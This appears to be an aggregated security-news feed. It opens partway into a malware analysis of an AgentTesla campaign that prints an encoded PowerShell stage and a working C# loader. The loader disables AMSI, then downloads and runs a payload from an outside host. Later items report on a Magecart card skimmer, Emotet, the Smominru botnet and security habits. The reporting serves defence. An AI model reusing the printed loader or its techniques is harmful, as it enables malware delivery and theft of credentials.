25e19175053570c531c00540b04074a410951040757585256530209540404560c401d4b5850041c07065f5001555e042b5a16334d101a38064b0d1d190456165b420f0b57010158442b5a16334d10140000585455035e4f030054020e4a5107050b57034e010e5052514b1b500752060d030400550e520552510c5506525708520052560c01055241104b0f0b0511005703555803095f2a5716641611173851100c1019530d1756425850560c010f1f36700c4032174b425007555f51094a36700c4032174b4b015916500c4042070c0102535e09595d044b180f0d5b5b0b010c4a015a0302030215065154050a4e041a57094e5b17171906010155084b1d190456165b420f0b5701015844204d1606623f140752005552005b0419041a50084e041a055f4e041a5a091f0f2b0d4d32401043520751515a585f7903114a0a550e4d780e580d007125580d01580e1c514a022f5510105103584c2056124d4a06085b030401014e044e085c07075b0215511d59095a04565051110c511543700c4032174b4a5601020f03554c37562b5a16550d4a1d49534152045301104e5f07060a5b554e5010595850560c010e42345c00770e0a5c0c4042115d53075a5a040c5115436e0756210f50075a164b1059471611500c53421a5b0755555a04275a140a4b0d5a0f0657161a25064d245b0e075c10640317514a710c1550105b0c0e5c0c404c304907570b0255245b0e075c101a2313490e5d01024d0b5b0c275816554b481b3e681a50585a05034112000350050a4a16560009540053530e401d59115d53075a5a17265b150d550d550625500e514a010e5052514b1b525553540d060550535c565056000d070557570a565752010c5a04015609530453550d0304035258520552000c560006570a530656060c0304065658530252550c550554525b530652050d010457565d5257535308540451565f525653530c5604555709565053560c520455570a530556000e060555570f500152010c5a0404550d5250535008550455575a5203404a151b5607020e5b1d59334b0d5707104a314003114d2b5a040c190c0150005c04515f0d5c1514321156015111106a16551017700c520d4b4000510354004b0f3211560151111017314003114d4a5a57515a0752074a02105116164b0c145258441241000f500114111758165d01434a16460b0d5e425655515f511c11174b0b5a05434a53525557584b4f11174b0b5a054358040055575b570940015a5b565641021140100a5705141707085601535e6a16460b0d5e4c710f134d1b0f040c4b4a5d0c17190b095258505e4753050e56554c2f5c0c53160b020b1f5f511019561b175c424203570f03035f20560c4207114d4c600d214016514a10080403560217314100104d105d0c04110b18504a1553024b584c060556560849094a005103464b4b4f030054020e426a42025f560356010c391c0b4c0b4b14474358040055575b571a2e065705400a3e10594910064d17460c434c060556560859491f’;$k61b35e2 = b72f3($k61b35e);
  4. Add-Type -TypeDefinition $k61b35e2;[p99a3fb]::o81f67();

Code Snippet 1

The Powershell stage is substantially composed of three parts: the first is the declaration of  function “b72f3()”, having the purpose to deobfuscate the second part of the script, contained into the “$k61b35e” variable. It actually is a C# source code snippet, compiled and loaded within the Powershell process at execution time. Once loaded, the third part of the script invokes the “o81f67()” method of the just compiled “p99a3fb” class.

  1. using System;
  2. using System.Runtime.InteropServices;
  3. using System.Diagnostics;
  4. using System.IO;
  5. using System.Net;
  6. public class p99a3fb{
  7. [DllImport(“kernel32″,EntryPoint=”GetProcAddress”)]
  8. public static extern IntPtr va46a7(IntPtr af474b5,string a2457);
  9. [DllImport(“kernel32”, EntryPoint = “LoadLibrary”)] public static extern IntPtr ud1451(string j4d4b5);
  10. [DllImport(“kernel32″, EntryPoint=”VirtualProtect”)] public static extern bool m9982c8(IntPtr sfff854,UIntPtr j5236a, uint r427a, out uint m8a94);
  11. [DllImport(“Kernel32.dll”, EntryPoint=”RtlMoveMemory”, SetLastError=false)] static extern void jcfb22(IntPtr mf1b8,IntPtr dcad15,int k456b);
  12. public static int o81f67(){
  13. IntPtr eef257 = ud1451(b72f3(“030e4a0b1a060f55”));
  14. if(eef257==IntPtr.Zero){goto l255c;}
  15. IntPtr bca6aa=va46a7(eef257,b72f3(“230e4a0b67010257204104055c10”));
  16. if(bca6aa==IntPtr.Zero){goto l255c;}
  17. UIntPtr de6f3=(UIntPtr)5;
  18. uint d5c61=0;
  19. if(!m9982c8(bca6aa,de6f3,0x40,out d5c61)){goto l255c;}
  20. Byte[] e197fb8={0x31,0xff,0x90};
  21. IntPtr kee39a=Marshal.AllocHGlobal(3);
  22. Marshal.Copy(e197fb8,0,kee39a,3);
  23. jcfb22(new IntPtr(bca6aa.ToInt64()+0x001b),kee39a,3);
  24. l255c: WebClient rd1389=new WebClient();
  25. string ybea79=Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)+”\\x3a81a”+b72f3(“4c064107”);
  26. rd1389.DownloadFile(b72f3(“0a174d120e4d4c4e15434c0b580c5010164a0a1a010c544d43124e5a0d5a160657161b120f4c055d0c1016035f0b105407404d15500743114c7d1746250b580f640d1317074c07”),ybea79);
  27. ProcessStartInfo n52cefe=new ProcessStartInfo(ybea79);
  28. Process.Start(n52cefe);
  29. return 0;
  30. }
  31. public static string b72f3(string s1f74a){
  32. string af474b5=”bc9b4″;
  33. string ud1451=String.Empty;
  34. for(int i=0;
  35. i<s1f74a.Length;
  36. i+=2){
  37. byte va46a7=Convert.ToByte(s1f74a.Substring(i,2),16);
  38. ud1451+=(char)(va46a7 ^ af474b5[(i/2) % af474b5.Length]);
  39. } return ud1451;
  40. }
  41. }

Code snippet 2

Code Snippet 2 is the C# class to be loaded. It has the objective to download the payload from the drop url previosly decoded by the “b72f3()” function: “hxxp://www.handrush[.com/wp-content/plugins/akismet/views/DurGhamPop[.exe”

The payload is stored into “%APPDATA%\Roaming” path and it is immediately executed through the “Process.Start()” function.

The Loader

Hash51a95607ab767b8b70479bdb86cc0a20b53eda92cd11f3abbe9eda5616a50a97
ThreatAgent Tesla Loader
Brief DescriptionAgent Tesla .NET C# loader
Ssdeep12288:8OQeYYBAkiEK/jfG3JI0YXvL7VIUMbHdX9WBRktIx4urElCccP:8cYCdiEK/jGXqLhqNQAICurrccP

Table 2. Static information about the AgentTesla evasive loader

The dropped file payload is a .NET executable embedding some anti-analysis tricks. If it is executed on a virtual environment, the malware kills itself. It also uses some anti-debugging trick to decide if terminate its execution.

Figure 3: Method after which the process kills itself

According to the MSDN documentation, the method Delegate.CreateDelegate “creates a delegate of the specified type that represents the specified static method of the specified class, with the specified case-sensitivity and the specified behavior on failure to bind“. This way, the control flow is switched to the delegated method which actually points to a DLL containing the anti-analysis logic.

Figure 4: Loading routine of the internal DLL

Before passing the control to the “swety.dll” library, which is a sort of helper component with no particular scope except the identification of analysis environments, the first instructions executed here are designed to decode and load a byte array embedded inside the executable, unpacking the obfuscated code.

Figure 5: Decoding routine of the DLL

The Figure above shows how this payload is encoded within the byte array and the routine invoked to retrieve it. This byte array is actually a well-formed dll loaded through the “Thread.GetDomain().Load()” method. At this point, the control finally passes to the “swety.dll” library, the module in charge to detect the analysis environment.

The “Swety” Module

Hasha0c9472bc1660be648adce938d5447d38ba6d6f166d18d9e9b4ec4dd74c315c0
ThreatSwety evasion module
Brief Description.NET Swety evasion module
Ssdeep1536:fKTxXyAZ0ngmxSHOKQZfRWC/BiwGJ/827Lwv9kAdhUkIahRm48GSL/bq0g+9R26:fKpXGxxdZfE37+9pdhjTm2k/bmQ26

Table 3. Static information about the “swety” evasive module

This component is always a .NET executable. The name of the classes are self-explicative: for instance, there are clear references to Virtual Machine detection logic. 

Figure 6: Example of the enumeration of the Hypervisors

In Figure 9, the malware retrieves the information about the current hardware and compares it with a defined set of criteria, when it finds a match, it kills itself. Otherwise, the dll continues its execution and loads another PE file hidden inside the initial loader. This last executable file runs as a new thread within the initial loader context.

Figure 7: Loading of the AgentTesla final payload

The Payload 

Hash82213cd55fee5374e407b4b98c45d7b0d291682ec0fd91b3ea47c32752b54ab9
ThreatAgent Tesla
Brief DescriptionAgent Tesla Payload
Ssdeep6144:Ci+WZ3skyQgBYnQ7oEFjaRJ8d8ZxjD1N/a66Gq3ovDuItbP7:CbGyH5ZjaRedapNT6

Table 4. Static information about the AgentTesla payload

The extracted payload is a .NET binary file. AgentTesla and Hawkey have lots of pieces of code in common, and the analysis we made two months ago about the Hawkeye payload is similar to this one.

Figure 8: Recurrent string decryption routine through the usage of Rijndael algorithm

Also in this case every sensitive information, string or other information  is encrypted through Rijndael algorithm and it tries to evade the sandbox to the common user names of the principal sandboxes. The persistence mechanisms is practically the same and the installation path of detected during the analysis is “%APPDATA%/Roaming/SecondLORI/SecondLORI.exe” 

Figure 9: Sandbox evasion trick
Figure 10: Persistence mechanism

After its installation, the malware starts to retrieve all the credential stored within a wide list of web browsers, FTP clients, File Downloaders etc. For instance, it is able to steal accounts from:

  • Google Chrome
  • Yandex
  • Comodo Dragon
  • Cool Novo
  • Chromium
  • Torch Browser
  • 7Star
  • Amigo
  • Brave
  • Cent Browser
  • Chedot
  • Coccoc
  • Elements Browser
  • Epic Privacy
  • Kometa
  • Orbitum
  • Sputnik
  • Uran
  • Vivaldi
  • UC Browser
  • Flock Browser
  • CoreFTP
  • FileZilla
  • JDownloader
  • QQBrowser
  • Outlook
  • SeaMonkey
  • Thunderbird

The harvested credentials are then sent back to the attacker servers. The malware leverages the .NET API to easily set up a mail client to transmit the loot to a particular mailbox.

Figure 11: SMTP client account configuration

The name of the sender, “Lori”, matches the name in the persistence mechanism, “SecondLORI”. This username may belong to a previously compromised email account the attacker uses as a sort of SMTP relay to deliver the loot to the real exfiltration address, a GMail mailbox named “chevyview450@gmail.com”. 

Figure 12: SMPT communication

Conclusion

As we stated in the previous post about a custom weaponization of the Hawkeye info-stealer, these kinds of malware are well known and highly used by cyber criminals. But despite their popularity event into the info-sec community, these “commodity tools” still result to be quite effective especially when combined within custom multistage infection chains, renewing their dangerousness and effectiveness.

Further technical details, including Indicators of Compromise, are reported in the analysis published by the experts at the Cybaz-Yoroi ZLAB.

https://blog.yoroi.company/research/commodity-malware-reborn-the-agenttesla-total-oil-themed-campaign/

Pierluigi Paganini

(SecurityAffairs – AgentTesla, malware)

The post Commodity Malware Reborn: The AgentTesla “Total Oil” themed Campaign appeared first on Security Affairs.

Magecart attackers target mobile users of hotel chain booking websites

Trend Micro researchers reported that a Magecart group has hacked the websites of two hotel chains to inject scripts targeting Android and iOS users.

Researchers discovered a series of incidents involving software credit card skimmer used by Magecart to hit the booking websites of hotel chains.

In early September, the researchers discovered a JavaScript code onto two hotel websites belonging to different hotel chains. The JavaScript code was used to load a remote script on their payment page since August 9. 

“When we first checked the script’s link, it downloaded a normal JavaScript code. However, we found that the same link could also download a different script when we requested it from mobile devices like Android or iOS phones.” reads the analysis published by Trend Micro. “The downloaded script for mobile devices is a credit card skimmer which can steal the information entered on the hotel booking page and send it to a remote server.”

Experts noticed that the link would deliver a credit card skimmer script only when users visited the websites using mobile devices, suggesting that the attackers aimed at targeting only mobile users.

Trend Micro noticed that infected websites were developed by Roomleader, a firm that designs online booking websites. Threat actors injected the malicious code in the Roomleader module “viewedHotels.”

Although the module was only used for two websites of two different hotel chains, the number of potential victims is very high, as one of these brands has 107 hotels in 14 countries, while the other has 73 hotels in 14 countries.

“Despite the seemingly small number of affected sites, we still consider the attack significant given that one of the brands has 107 hotels in 14 countries while the other has 73 hotels in 14 countries. Note that we have reached out to Roomleader regarding this issue.” continues the analysis.

Magecart

The code injected in the websites first checks if an HTML element containing the ID “customerBookingForm” is present on the webpage to verify that it is running on the hotel’s booking page.

If the code detects the booking page, it will check if the browser debugger is closed and then load another JavaScript from the URL hxxps://googletrackmanager[.]com/gtm[.]js that contains the card skimmer code.

The skimmer hooks the JavaScript events that are triggered when customers make a payment or submit a booking. When these events happen, the skimmer checks if the browser debugger is closed, then copies the name and value from “input” or “select” HTML elements on the booking page.

The skimmer script used in these attacks collects customers’ data, including names, email addresses, telephone numbers, hotel room preferences, and of course, credit card details.

The script encrypts data with RC4 using a hardcoded key, encoded using XOR, and then sent via HTTP POST to “https://googletrackmanager[.]com/gtm.php?id=.” The scripts appens the random string used to encode the data at the end.

The software skimmer replaces the original credit card form on the booking page, in this way attackers could require customers to submit all credit card data, including the CVC number that is not required in some booking pages. This trick also works to collect all customers data when the websites use secure iframes to load the credit card form from a different domain.

Magecart attackers created fake credit card forms in English, Spanish, Italian, French, German, Portuguese, Russian, and Dutch.

Trend Micro pointed out the network infrastructure and the scripts used in this attack could not be strongly linked to previous Magecart attacks.

“We were unable to find any strong connections to previous Magecart groups based on the network infrastructure or the malicious code used in this attack. However, it’s possible that the threat actor behind this campaign was also involved in previous campaigns.” concludes Trend Micro.

Pierluigi Paganini

(SecurityAffairs – Magecart, hacking)

The post Magecart attackers target mobile users of hotel chain booking websites appeared first on Security Affairs.

Key threats and trends SMB IT teams deal with

MSPs are significantly more concerned with internal data breaches and rapidly evolving technology practices, whereas internal IT teams are more concerned with employee behavior/habits, according to a Central by LogMeIn report. The global survey, which polled 500 IT professionals across North America and Europe, also showed that top security concerns remain consistent year over year with 54 percent of IT professionals ranking malware as their number one security concern, followed by ransomware (46 percent) and … More

The post Key threats and trends SMB IT teams deal with appeared first on Help Net Security.

Eight great habits that enterprises can practice for bolstering cybersecurity

Estimated reading time: 3 minutes

Efficient cybersecurity is built on the foundation of good habits practised by internal customers. Enterprises may think a great deal about implementing effective cybersecurity practices and have plenty of meetings, but it’s actually not that complicated.

An effective framework is the first step but more importantly, is ensuring effective habit-formulation.

Unfortunately, enterprises are populated by humans who like to take the easier but riskier way out. Whether it’s setting the same password across all accounts, leaving data freely available or using company devices on risky Wi-Fi networks, bad habits can be problematic.

Here are a few tendencies that should be eliminated as soon as possible.

  1. Weak passwords

The problem with weak passwords is an issue that plagues an entire organization, from the top to the bottom. It’s not enough to have a policy about strong passwords – it’s also important to run regular campaigns across the entire organization with real-life case studies to educate employees on the importance of using strong passwords and how to do so.

  1. A lack of a security policy

The lack of a single unified security policy is an extremely bad enterprise security habit. A proper policy keeps all information and strategies in one place, becoming a one-stop repository in case of crises. Without a security policy, it is difficult for enterprises to remain protected.

  1. Taking shortcuts

When enterprises underestimate the damage cyberattacks, the propensity is to run towards shortcuts. This means being reactionary to attacks and not taking cybersecurity seriously by running the most basic of solutions and not investing too much time and energy. This is a recipe for disaster – cybersecurity is an extremely important function of an enterprise today and needs to be taken as seriously as any other function.

  1. Forgetting to have cybersecurity drills

Just like fire safety drills, it’s important to have regular cybersecurity drills. This inculcates preparedness into employees and gives them an idea of what happens during a cyberattack. But many organizations go for months and years without having one. This makes them extremely unprepared in the event of an actual cyber attack.

  1. Delayed patching and updating

Vulnerabilities in different enterprise software are often found every day and patches & updates are released to keep businesses safe from a cyber strike. But organizations can often be guilty of not being up-to-date on patching software for vulnerabilities. Hackers and cybercriminals are aware of this and often use these vulnerabilities to enter systems and cause immense chaos.

  1. Not investing in backup

An enterprise security framework goes a long way in enabling protection and strong solutions can also play a part. But it’s always important to have a fallback plan and that is where backup comes in. By backing up critical data at regular intervals, enterprises can ensure they have something to fall back on, in case of critical situations. However, many enterprises neglect this important step and as a result, put themselves at great risk in the event of unforeseen circumstances.

  1. Underestimating social engineering

Many enterprises can slip into the notion that cybersecurity is purely a technological problem and putting in place, a strong cybersecurity solution can solve all problems. But that is not the case – social engineering is as big an issue as cybersecurity, nowadays. The only way to solve this is to ensure that employees are as well- versed in cybersecurity issues.

  1. The problem with access control

Access control is an issue almost every organization struggles with. They may have the strongest firewalls but it can be sometimes of no use if every user in the organization has access to everything. That makes the company very susceptible to insider breaches. This also means that, if a hacker manages to gain control of a system with access to the network he can break the entire IT infrastructure.

Seqrite’s Unified Threat Management (UTM) provides a one-stop solution for many of the problems identified above. It acts as the first line of defence providing IT security management, a safe working environment, high productivity, regulatory compliance in a cost-effective way.

The post Eight great habits that enterprises can practice for bolstering cybersecurity appeared first on Seqrite Blog.

Emotet is back, it spreads reusing stolen email content

Emotet is back, its operators leverage a recently introduced spear-phishing technique to deliver their malware, they are hijacking legitimate email conversations.

In 2019, security experts haven’t detected any activity associated with Emotet since early April, when researchers at Trend Micro have uncovered a malware campaign distributing a new Emotet Trojan variant that compromises devices and uses them as Proxy C2 servers.

In the last four months, Emotet was not spotted in the wild, but now the threat is back with an active spam distribution campaign. Researchers from Malwarebytes observed the Trojan started pumping out spam, spam messages initially targeted users in Germany, Poland and Italy, and also the US. The campaign continues targeting users in Austria, Switzerland, Spain, the United Kingdom, and the United States.

The researchers observed hundreds of thousands of messages were sent as part of this distribution effort.

The most notable characteristic of this campaign is the reuse of stolen email content to trick recipients into opening attachments or clicking on links pointing to weaponized Word documents that were used to fetch and execute Emotet.

“Note the personalization in the email subject lines. Borrowing a tactic from North Korean nation-state actors, Emotet’s creators are bringing back highly sophisticated spear phishing functionality introduced in April 2019, which includes hijacking old email threads and referencing to the user by name.” reads the report.

The operators are hijacking legitimate email threads as part of a social engineering attack.

Emotet email

The same activity was observed by the malware researchers at Cisco Talos group.

“One of Emotet’s most devious methods of self-propagation centers around its use of socially engineered spam emails. Emotet’s reuse of stolen email content is extremely effective.” reads the analysis published by Talos.

“Once they have swiped a victim’s email, Emotet constructs new attack messages in reply to some of that victim’s unread email messages, quoting the bodies of real messages in the threads,”

The operators are also using real subject headers and email contents in the attempt to bypass anti-spam systems.

“By taking over existing email conversations, and including real Subject headers and email contents, the messages become that much more randomized, and more difficult for anti-spam systems to filter.” continues Talos.

Emotet has been swiping email credentials for the victims and sharing them with other bots in its network to send out spam messages.

Experts at Talos discovered that in April 2019, Emotet was using hijacking email conversations in only 8.5% of the infection attempts. The situation is now changed, the latest campaign sees that stolen email threads appeared in nearly one quarter of Emotet’s outbound emails.

“Looking at all the email Emotet attempted to send during the month of April 2019, we found Emotet included stolen email conversations only approximately 8.5 percent of the time. states Talos. Since Emotet has reemerged, however, we have seen an increase in this tactic with stolen email threads appearing in almost one quarter of Emotet’s outbound emails.”

The operators used a large database of potential recipients in this last campaign, experts noticed that 97.5% of Emotet’s recipients reached in April 2019 received only a single spam message.

Emotet has been around for years, this reemergence comes as no surprise. The good news is, the same advice for staying protected from Emotet remains. To avoid Emotet taking advantage of your email account, be sure to use strong passwords and opt in to multi-factor authentication, if your email provider offers that as an option.” concludes the experts. “Be wary of emails that seem to be unexpected replies to old threads, emails that seem suspiciously out of context, or those messages that come from familiar names but unfamiliar email addresses.”

Pierluigi Paganini

(SecurityAffairs – Emotet, malware)

The post Emotet is back, it spreads reusing stolen email content appeared first on Security Affairs.

Smominru Botnet continues to rapidly spread worldwide

Researchers at Guardicore Labs reported that the Smominru botnet is rapidly spreading and now is already infecting over 90,000 machines each month around worldwide.

In February 2018, researchers from Proofpoint discovered a huge botnet dubbed ‘Smominru’ that was using the EternalBlue exploit to infect Windows computers and recruit them in Monero cryptocurrency mining activities. According to the researchers, the Smominru botnet has been active at least since May 2017 and at the time of its discovery infected more than 526,000 Windows computers.

According to a new report published by the researchers at Guardicore Labs, the Smominru, is rapidly spreading and now is already infecting over 90,000 machines each month around worldwide.

The report published by Guardicore Labs researchers analyzes the attack chain and the nature of the victims.

Experts discovered that many machines recruited in the botnet were reinfected even after removing the Smominru, a circumstance that suggests that these systems remain unpatched since first infection. 

“During August, the Smominru botnet infected 90,000 machines around the world, with an infection rate of 4,700 machines per day. Countries with several thousands of infected machines include China, Taiwan, Russia, Brazil and the US.” reads the report published by the experts.

Most of the infected systems are Windows 7 and Windows Server 2008, representing 85 percent of all infections, in China, Taiwan, Russia, Brazil and the US.

In just one month, the worm infected more than 4,900 networks, some of them had dozens of internal machines infected. The largest network belongs to a healthcare provider in Italy, experts observed a total of 65 infected hosts.

Once compromised the system, a first-stage Powershell script named blueps.txt is downloaded onto the machine. This script performs the following actions:

  • It downloads and executes three binary files;
  • It creates a new administrative user named admin$ on the system;
  • It downloads additional scripts to perform malicious actions.

Smominru

Once gained access to the targeted systems, Smominru installs a Trojan module and a cryptocurrency miner and attempt to infect other machines inside the target network.

The botnet main purpose continues to be crypto-mining but recently experts observed that operators added a data harvesting module and Remote Access Trojan (RAT) to their botnet’s cryptocurrency mining code.

The latest variant of Smominru downloads and runs at least 20 distinct malicious scripts and binary payloads, including a worm downloader and an MBR rootkit.

The storage infrastructure is widely distributed, experts found more than 20 servers, each of them serves a few files and each file references additional 2-3 servers.

Operators stored many of the files on more than one hosting server, to improve the resilience of attack infrastructure to takedowns and its flexibility.

Most of the machines are located in the US, with some hosted by ISPs in Malaysia and Bulgaria. 

“The attackers create many backdoors on the machine in different phases of the attack. These include newly-created users, scheduled tasks, WMI objects and services set to run at boot time.”continues the report.”The MS-SQL attack flow includes a unique persistence method; the attackers use the obscure task scheduling engine inside MS-SQL to run jobs at different time intervals, e.g. upon reboot, every 30 minutes, etc. “

Guardicore Labs experts managed to gain access to one of the attackers’ servers and analyzed its content to gather information on the nature of the victims.

“The attackers’ logs describe each infected host; they include its external and internal IP addresses, the operating system it runs and even the load on the system’s CPU(s). Furthermore, the attackers attempt to collect the running processes and steal credentials using Mimikatz,” the researchers say. continues the report.

Unlike previous variants, the new Smominru bot also removes infections from compromised systems and blocking TCP ports (SMB, RPC) to prevent infections by other threat actors.

Further data, including Indicators of Compromise, are reported in the analysis published by the experts.

Pierluigi Paganini

(SecurityAffairs – APT, hacking)

The post Smominru Botnet continues to rapidly spread worldwide appeared first on Security Affairs.

A Guide on 5 Common LinkedIn Scams

The fact that scammers haunt Facebook and Twitter is not surprising. Even so, digital criminals don’t stop with just those two platforms. They’re also known to stalk users on LinkedIn where connections carry greater professional gravity. Fortunately, users can stay alert of such activity by familiarizing themselves with the most common types of LinkedIn scams. […]… Read More

The post A Guide on 5 Common LinkedIn Scams appeared first on The State of Security.